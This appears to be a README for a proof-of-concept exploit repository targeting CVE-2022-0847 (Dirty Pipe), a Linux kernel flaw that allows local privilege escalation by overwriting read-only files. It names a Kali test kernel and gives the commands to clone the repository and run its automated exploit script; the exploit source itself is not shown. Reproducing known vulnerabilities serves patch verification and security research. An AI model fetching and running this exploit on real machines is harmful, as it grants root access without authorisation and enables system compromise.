
Proof-of-concept exploit for CVE-2022-0847 (Dirty Pipe), a Linux kernel vulnerability enabling local privilege escalation via overwriting read-only files. Includes automated shell script for exploitation.
Simple reproduction of CVE-2022-0847
Original article by the disclosing author: https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
